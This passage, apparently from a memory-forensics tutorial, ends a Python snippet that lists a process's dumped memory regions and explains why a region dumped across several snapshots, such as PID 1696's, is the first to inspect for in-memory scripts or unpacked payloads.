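            print(f"pid {pid}: {start:#x}-{end:#x} ({size_label(end - start)}) snapshots {seqs}")
```

A region that is dumped repeatedly across snapshots, as with PID 1696 here, is the first one to open in a disassembler or strings tool: it is a private region that stayed mapped while the process worked, which is where an in-memory script or unpacked payload would normally be found.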